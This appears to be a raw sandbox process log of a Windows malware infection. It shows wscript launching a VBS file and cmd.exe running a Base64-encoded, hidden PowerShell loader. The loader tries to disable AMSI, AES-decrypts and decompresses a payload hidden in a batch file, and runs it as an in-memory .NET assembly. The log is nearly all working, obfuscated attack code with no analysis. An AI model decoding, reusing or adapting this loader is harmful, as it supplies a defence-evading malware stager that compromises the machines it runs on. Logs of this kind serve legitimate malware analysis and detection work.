wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\8191032732_1740264845.vbs
2552cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Local\Temp\EWVm.bat';iex ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("cG93ZXJzaGVsbCAtdyBoaWRkZW47aWV4ICgoJChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnYVZOVVVrbE9SMUpCVGtSUFRXVlRWRkpKVGtkU1FVNUVUMDE0VTFSU1NVNUhVa0ZPUkU5TklDaFRWRkpKVGtkU1FVNUVUMDBvVTFSU1NVNUhVa0ZPUkU5TmFWTlVVa2xPUjFKQlRrUlBUWGRUVkZKSlRrZFNRVTVFVDAxeVUxUlNTVTVIVWtGT1JFOU5JQzFUVkZKSlRrZFNRVTVFVDAxVlUxUlNTVTVIVWtGT1JFOU5jMU5VVWtsT1IxSkJUa1JQVFdWVFZGSkpUa2RTUVU1RVQwMUNVMVJTU1U1SFVrRk9SRTlOWVZOVVVrbE9SMUpCVGtSUFRYTlRWRkpKVGtkU1FVNUVUMDFwVTFSU1NVNUhVa0ZPUkU5TlkxTlVVa2xPUjFKQlRrUlBUVkJUVkZKSlRrZFNRVTVFVDAxaFUxUlNTVTVIVWtGT1JFOU5jbE5VVWtsT1IxSkJUa1JQVFhOVFZGSkpUa2RTUVU1RVQwMXBVMVJTU1U1SFVrRk9SRTlOYmxOVVVrbE9SMUpCVGtSUFRXZFRWRkpKVGtkU1FVNUVUMDBnSWxOVVVrbE9SMUpCVGtSUFRXaFRWRkpKVGtkU1FVNUVUMDEwVTFSU1NVNUhVa0ZPUkU5TmRGTlVVa2xPUjFKQlRrUlBUWEJUVkZKSlRrZFNRVTVFVDAwNlUxUlNTVTVIVWtGT1JFOU5MMU5VVWtsT1IxSkJUa1JQVFM5VFZGSkpUa2RTUVU1RVQwMDRVMVJTU1U1SFVrRk9SRTlOTjFOVVVrbE9SMUpCVGtSUFRTNVRWRkpKVGtkU1FVNUVUMDB4VTFSU1NVNUhVa0ZPUkU5Tk1sTlVVa2xPUjFKQlRrUlBUVEZUVkZKSlRrZFNRVTVFVDAwdVUxUlNTVTVIVWtGT1JFOU5OMU5VVWtsT1IxSkJUa1JQVFRsVFZGSkpUa2RTUVU1RVQwMHVVMVJTU1U1SFVrRk9SRTlOTVZOVVVrbE9SMUpCVGtSUFRUQlRWRkpKVGtkU1FVNUVUMDB6VTFSU1NVNUhVa0ZPUkU5TkwxTlVVa2xPUjFKQlRrUlBUV1JUVkZKSlRrZFNRVTVFVDAxdlUxUlNTVTVIVWtGT1JFOU5kMU5VVWtsT1IxSkJUa1JQVFc1VFZGSkpUa2RTUVU1RVQwMXNVMVJTU1U1SFVrRk9SRTlOYjFOVVVrbE9SMUpCVGtSUFRXRlRWRkpKVGtkU1FVNUVUMDFrVTFSU1NVNUhVa0ZPUkU5TkwxTlVVa2xPUjFKQlRrUlBUV0ZUVkZKSlRrZFNRVTVFVDAxaVUxUlNTVTVIVWtGT1JFOU5ZMU5VVWtsT1IxSkJUa1JQVFM1VFZGSkpUa2RTUVU1RVQwMTBVMVJTU1U1SFVrRk9SRTlOZUZOVVVrbE9SMUpCVGtSUFRYUlRWRkpKVGtkU1FVNUVUMDBpVTFSU1NVNUhVa0ZPUkU5TktWTlVVa2xPUjFKQlRrUlBUUzVUVkZKSlRrZFNRVTVFVDAxRFUxUlNTVTVIVWtGT1JFOU5iMU5VVWtsT1IxSkJUa1JQVFc1VFZGSkpUa2RTUVU1RVQwMTBVMVJTU1U1SFVrRk9SRTlOWlZOVVVrbE9SMUpCVGtSUFRXNVRWRkpKVGtkU1FVNUVUMDEwVTFSU1NVNUhVa0ZPUkU5TkxsTlVVa2xPUjFKQlRrUlBUVkpUVkZKSlRrZFNRVTVFVDAxbGNHeGhZMlVvSjBGQ1F5Y3NKeWNwS1NBdFJYSnliM0pCWTNScGIyNGdVMmxzWlc1MGJIbERiMjUwYVc1MVpUcz0nKSkpKSAtcmVwbGFjZSAnU1RSSU5HUkFORE9NJywgJycpO3RyeXsgSW52b2tlLVN5c1JvdXRpbmUgLURpc2FibGVTdmMgLUVycm9yQWN0aW9uIFN0b3AgfWNhdGNoeyBXcml0ZS1PdXRwdXQgIm1vZGlmaWVkIEFNU0kiIH07ZnVuY3Rpb24gVkZHS0IoJHBhcmFtX3Zhcil7JGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOyRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzskYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnRWkvNkNIVnl5cjdxczJDaTBSd0JJOERIbHNIUWkwKzVaaitpS1dzNU81MD0nKTskYWVzX3Zhci5JVj1bU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCcyeVAwSHhYWUh6NG8rOVk5YmdneXBRPT0nKTskRE1DT0c9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7JFNEVkJWPSRETUNPRy5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsMCwkcGFyYW1fdmFyLkxlbmd0aCk7JERNQ09HLkRpc3Bvc2UoKTskYWVzX3Zhci5EaXNwb3NlKCk7JFNEVkJWO31mdW5jdGlvbiBkZWNvbXByZXNzX2Z1bmN0aW9uKCRwYXJhbV92YXIpeyRVVFJUVz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOyRMWVhGQT1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JFhXWEFCPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJFVUUlRXLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskWFdYQUIuQ29weVRvKCRMWVhGQSk7JFhXWEFCLkRpc3Bvc2UoKTskVVRSVFcuRGlzcG9zZSgpOyRMWVhGQS5EaXNwb3NlKCk7JExZWEZBLlRvQXJyYXkoKTt9JEhXWFJPPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskcGF5bG9hZDJfdmFyPWRlY29tcHJlc3NfZnVuY3Rpb24gKFZGR0tCIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJEhXWFJPLCA2KS5TdWJzdHJpbmcoMikpKSk7W1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRwYXlsb2FkMl92YXIpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtjbGVhcjs="))) "
2792powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2828